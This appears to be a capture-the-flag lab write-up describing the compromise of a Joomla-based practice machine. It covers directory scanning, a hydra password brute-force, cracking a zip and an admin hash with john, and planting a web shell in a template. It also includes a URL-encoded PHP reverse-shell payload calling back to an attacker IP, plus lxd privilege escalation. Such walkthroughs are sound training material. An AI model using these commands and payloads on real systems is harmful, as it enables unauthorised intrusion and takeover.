Target IP: 10.10.117.63
There are three TCP ports open on the target machine: SSH, HTTP, and another HTTP application.
Port 80: HTTP
The webpage above is displayed for this application. Viewing the source-code of this webpage displays the different Joker quotes.
Running a directory search using the command gobuster dir -u http://10.10.117.63 -w /usr/share/wordlists/dirb/big.txt -x php,html,txt against this application displays the important details above. The phpinfo.php provides more information about the host, such as PHP version.
The secret.txt contains the message above. This message contains two possible usernames we can target the SSH and other HTTP application if it supports login: Batman and Joker. I tried finding other directories using other wordlists but I could not.
Port 8080: HTTP
This application requests me to login. When using curl against this port, the output above is shown.
Using hydra and the command hydra -l joker -P /usr/share/wordlists/rockyou.txt 10.10.117.63 -s 8080 http-get, I managed to crack the password for the user joker for the HTTP application on the higher port. Now I have the credential joker:hannah.
I managed to login using the credential above. Now I have access to the CMS.
Browsing to /robots.txt contains the entries above.
The /administrator looks interesting as it is the admin panel but I need the username and password. Firing default credentials did not work either.
Performing a directory search with the login shows an interesting file called backup.zip. I downloaded this file on my machine but it is password protected.
Using john I obtained the password of this backup.zip file. It is hannah.
I found an interesting file called configuration.php. This file contains the username and password in plaintext for the application. However, I was unable to login using this. I also notice the name of the database for this application is joomladb.
When looking through the contents of joomladb.sql, I notice an interesting table as shown above. There is a user called admin with the password hash of $2y$10$b43UqoH5UpXokj2y9e/8U.LD8T3jEQCuxG2oHzALoJaj9M5unOcbG. I copied this password hash to my local machine.
After running john on the new password hash, I obtained the password abcd1234 for the user admin. I should be able to login to the Joomla administrator panel now.
And boom! I now have access to the Joomla application using admin:abcd1234. Time to upload a reverse-shell!
I notice the Templates can be changed for Protostar. I will inject my simple web-shell at error.php, as shown above.
And my web-shell got uploaded and I can perform RCE on it. I browsed to http://10.10.117.63:8080/templates/protostar/error.php to execute commands. Time to gain a full reverse shell connection now.
And now I have a full reverse shell connection on port 8443. The PHP payload used is listed below. Time to escalate privileges to root!
PHP payload used: php%20-r%20%27%24sock%3Dfsockopen%28%2210.14.55.153%22%2C8443%29%3Bshell_exec%28%22%2Fbin%2Fbash%20%3C%263%20%3E%263%202%3E%263%22%29%3B%27.
Full URL with payload: http://10.10.117.63:8080/templates/protostar/error.php?cmd=php%20-r%20%27%24sock%3Dfsockopen%28%2210.14.55.153%22%2C8443%29%3Bshell_exec%28%22%2Fbin%2Fbash%20%3C%263%20%3E%263%202%3E%263%22%29%3B%27.
What? www-data is in the lxd group? Looks like I can use this to gain a root shell.
I downloaded alpine-v3.13-x86_64-20210218_0139.tar.gz on my machine and transferred it to the target machine. Now I have a root shell.
The final flag is at new mount /mnt/root/root with the name final.txt. GG.